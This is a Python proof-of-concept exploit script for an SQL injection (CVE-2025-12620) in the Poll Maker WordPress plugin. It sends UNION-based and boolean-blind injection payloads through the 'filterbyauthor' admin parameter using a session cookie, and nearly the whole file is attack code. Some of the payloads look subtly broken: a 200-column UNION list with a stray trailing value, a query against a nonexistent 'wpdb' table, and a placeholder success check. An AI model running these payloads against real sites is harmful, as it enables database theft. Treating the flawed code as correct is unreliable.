# CVE-2025-12620 PoC - SQL Injection in Poll Maker WordPress Plugin
# Requires Administrator-level access
import requests
import sys
from urllib.parse import quote
TARGET_URL = "http://target-wordpress-site.com"
COOKIES = {
"wordpress_test_cookie": "WP+Cookie+check",
"wordpress_logged_in_user": "your_admin_session_cookie"
}
def exploit_sql_injection():
"""
SQL Injection via filterbyauthor parameter in Poll Maker <= 6.0.7
This PoC demonstrates extracting the WordPress database prefix and user count
"""
# Target endpoint: WordPress admin admin.php with poll-maker poll list
endpoint = f"{TARGET_URL}/wp-admin/admin.php"
# Malicious payload to extract database user() and version()
# Original query is appended with our injection
injection_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,101---"
params = {
"page": "poll-maker-polls",
"filterbyauthor": injection_payload
}
try:
response = requests.get(endpoint, params=params, cookies=COOKIES, timeout=30)
if response.status_code == 200:
print(f"[+] Request sent successfully")
print(f"[+] Check response for injected SQL results")
print(f"[*] Target URL: {response.url}")
else:
print(f"[-] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"[-] Error: {e}")
def blind_sql_injection():
"""
Boolean-based blind SQL injection for data extraction
"""
# Example: Extract WordPress table prefix
target = f"{TARGET_URL}/wp-admin/admin.php"
for i in range(1, 20):
for ascii_val in range(32, 127):
char = chr(ascii_val)
payload = f"1' AND ASCII(SUBSTRING((SELECT wpdb.table_name FROM wpdb LIMIT 1),{i},1))={ascii_val}---"
params = {"page": "poll-maker-polls", "filterbyauthor": payload}
try:
resp = requests.get(target, params=params, cookies=COOKIES, timeout=10)
# Based on response timing or content differences
if resp.status_code == 200 and "expected_result" in resp.text:
print(f"Found character {i}: {char}")
break
except:
pass
if __name__ == "__main__":
print("CVE-2025-12620 SQL Injection PoC")
print("Target: WordPress Poll Maker Plugin <= 6.0.7")
exploit_sql_injection()